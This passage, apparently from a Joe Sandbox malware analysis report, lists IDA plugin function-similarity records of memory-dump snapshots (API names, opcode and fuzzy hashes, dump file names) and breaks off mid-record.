                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                                                                                                                • Instruction ID: 39dcf0ba5c993f8acaa352d8244de42a2eecc563279bc08c01e6ec00ae3447fa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d395fef6bf6d2161f205ad2dbd11117f8f32b2c6da05af5b4328dea44ce9941
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA41926652C7C5C1CB35CF21A058AEABB75F395784F458047DBC953BABCE39C8A88B40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
                                                                                                                                                                                                                                • Instruction ID: 9c7f88489a1839b4aec94a6f29d8bfc2c4acfa4cdf3f99282895ac0092058e99
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 87ddd31ae5fda347235228c36177d9caa1af38e3f2d78a0fbcc62b30e0d1f058
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC31E873611AC086C7649F26D4407AD7770F3E8FE4F594226EEAA47794DB34C442C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                                                • Instruction ID: ae78281c8a26ec7e0b11a5b75497a4f1dee05c1e775be920f05532815b7bd8f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2104A3201B8889DB15AF26EC557396364BF65B94F9DC125EF6D0B380DF7C8882C312
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
                                                                                                                                                                                                                                • Instruction ID: 4826583f6ac66bebd3ce5034c96ed097a1b7988347eb14c2fad82e50bdd556df
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b8be88fbbd6b5478f1b8fe33e7292913211728ee70c3487ba27a43df7afdd97
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D219237612A9487CB21DF26D4106297361E7A5FE4B198227DE6D0B398DF38D842C760
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 001E779B
                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 001E77A7
                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 001E783C
                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 001E7848
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3168844106-0
                                                                                                                                                                                                                                • Opcode ID: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                                                                                                                • Instruction ID: 1a5ae4cce782df1bfbd74aa8c77a5e3c888ffd12e3517f5ad41a3632fd7b208e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83212336604B8497DB609F2AE98865D3370F759B98F181122DB4D47B54DF38D8A9C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ExceptionThrowmalloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2043655614-0
                                                                                                                                                                                                                                • Opcode ID: 85820a4b7cfbf62d825ef575ed64e4517ae2fd90292bd41fdaee0927cf1864a6
                                                                                                                                                                                                                                • Instruction ID: cbc12f37a117a5351092ce7c435031d302b378a6ad4fb60c20d38cdf7f2cbebf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85820a4b7cfbf62d825ef575ed64e4517ae2fd90292bd41fdaee0927cf1864a6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D117272615B8481CB60EF25E88122D73B5F7E5BE4F248226EBAD477A8DF38C855C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                                                • Opcode ID: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                                                                                                                                                                                • Instruction ID: 6f1f384adbea27dfa609c98ee9da5f3d46f0f61343131f8a2951e74c19386600
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6301D6B232978165EF049F669C653E422A59BA5FC4F854430CE0A97305EF78C9E5C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                                                • Opcode ID: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                                                                                                                                                                                • Instruction ID: 82f93d38e1879d07d47acde971179a9f229591463f131b5f0edc5f7bb103876f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F01D2B2315709A1EB089F62AE553F82255AB59FD8F898021CF0997341EFB8CD95D344
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                                                • Opcode ID: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                                                                                                                                                                                • Instruction ID: 19e8c766cbfd945a20a7e4f143689620e2bd5928125279d120009bf5004810af
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5101D2B2304B8161EF089B679C593E822659B99FC4F8694318E4A97346EF38CED6C304
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                                                • Opcode ID: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                                                                                                                                                                                • Instruction ID: 9100bd9113f9322aec56b75f3f1b76c58c61777b3e2fedf7a0ee5d9612ba9a3e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C0104B2304308A1EB049F669D153F462529719FC4F864020CF0A97306EF34CD85D304
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                                                                                                                                                                                • Instruction ID: d245fe330f8897b0f4e8c7ed8f6c5c08f146e67853739bce405aef8de37eeb83
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6901B163710E98949A21AD9BE88062A6624BB61BE9B1D8217EF780B340EF70D843C310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                                                                                                                                                                                • Instruction ID: 3503706d40e67b07a57eb45f67c9c9be9ebcbf603ad25e1fe4d4b86398a4cf85
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51F05E6371199899CA14EE26DC911782364AFA6BA8B1C8172EF2D4B754EF20DC528310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                                                                                                                                                                                • Instruction ID: 3dbfdb2559d2b6613ca8663a59825e9a988648b47211ad0828194c9d4fa04c11
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79F0E9137115808ACA10AE27DC9016C6330BFB6BE471C4132EF2D0B744DF30D8A28320
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                                                                                                                • Instruction ID: 3f103b110347bc6753c3fab2be04ffc19a2c83ee46cf11e6f41d55187067e71e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F0892370188489C712AE26DC5117853309BB9FD571D8262DF3D4B355DF34DC428310
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 00a62c9dea15f2e0995e484cfa7bcfaa0faffe2e55e195a546d1069e927f4647
                                                                                                                                                                                                                                • Instruction ID: 4b9ab3f24d4134a4e7f2a2364064c92ec9c1fb8a634b7a2c4d8b7c8c81c6710f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00a62c9dea15f2e0995e484cfa7bcfaa0faffe2e55e195a546d1069e927f4647
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6851F574E01218DFCB19DFB4D594AADBBB2FF89304F209469D405AB3A4DB35A942CF44
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8ab5b48b349783be3845413237d17a0dac1b850521465f004fb3a34078cef58d
                                                                                                                                                                                                                                • Instruction ID: e90c6e440f71ca51a8e47b94932a0ca2bc535f3d3a4d24b2c5904282509a0276
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ab5b48b349783be3845413237d17a0dac1b850521465f004fb3a34078cef58d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1A2144B0E109158FD718CF1ADA80A95F7F2EFED310F56C2E5914C9B275E77099818E44
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: (Sr$(Sr
                                                                                                                                                                                                                                • API String ID: 0-324715715
                                                                                                                                                                                                                                • Opcode ID: b8c133d75eb93e2feb23c0f683844041966658b265a651dcfb5501823c42c4e4
                                                                                                                                                                                                                                • Instruction ID: f5ae1bce4f0e5a529edf9c07273e9bcc7f23b19547a3ba7d817b579e7b1d7278
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8c133d75eb93e2feb23c0f683844041966658b265a651dcfb5501823c42c4e4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DB1CF74A40219CFDB15DFA8C988ADDBBF1FF49304F1082A9E405AB3A5DB74A945CF90
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: a^q
                                                                                                                                                                                                                                • API String ID: 0-3411664965
                                                                                                                                                                                                                                • Opcode ID: a4dd3ef3885745343a31c4e0d910ff89bc95b0177fd5113fd194377962984989
                                                                                                                                                                                                                                • Instruction ID: adaf0948d0e8f1d0c1e37c9a731288621af41949cd5c86468589f712b782db53
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4dd3ef3885745343a31c4e0d910ff89bc95b0177fd5113fd194377962984989
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E91F474E00219CFCB05EFA8D584A9DBBB1FF89304F10966AD815AB3A5DB30A945CF54
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: (Sr
                                                                                                                                                                                                                                • API String ID: 0-1471372286
                                                                                                                                                                                                                                • Opcode ID: 31b87a90670153d2028cf3783feb7dae0bcdf4de8e9a6a10da509be0fa8ed4f8
                                                                                                                                                                                                                                • Instruction ID: d0000c30c0b2fb7ee75fd6705e3d76f39b7d00075eaaa9bdcb7332ac22f67cb3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31b87a90670153d2028cf3783feb7dae0bcdf4de8e9a6a10da509be0fa8ed4f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80410174D00219CFDB15DFA8C988AEDBBF2BF49308F1482A9D405AB3A5DB34A945CF54
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7797c90b587e6a5c8ab41394e131670a93abe25f5c099374fad2ca1c9bc3c43d
                                                                                                                                                                                                                                • Instruction ID: 16f30cdf45e98264beba6137aae353e5fa814b87543bcfccb3552849e9a146b7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7797c90b587e6a5c8ab41394e131670a93abe25f5c099374fad2ca1c9bc3c43d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BBF08C74949245CFC752EBBCE9446AC3BB1EF41204F11459AC80697BA1DB315E10EB52
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2729512856.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_2b00000_4268204ace.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
